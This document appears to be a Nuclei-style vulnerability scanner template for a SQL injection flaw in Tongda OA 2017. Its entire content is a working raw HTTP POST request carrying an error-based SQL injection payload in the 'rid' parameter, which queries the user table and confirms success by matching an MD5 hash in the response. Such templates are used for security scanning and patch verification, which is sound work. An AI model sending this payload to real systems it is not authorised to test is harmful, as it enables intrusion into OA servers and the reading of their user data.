id: tongda-sqli

info:
  name: 通达OA2017 sql注入漏洞
  author: Str1am
  severity: high
  tags: tongda,sqli

requests:
  - raw:
      - |
        POST /general/document/index.php/recv/register/turn HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _SERVER=&rid=exp(~(select*from(select concat(0x7e7e7e,md5(123),0x7e7e7e) from user limit 0,1)x))

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"
        part: body
        condition: and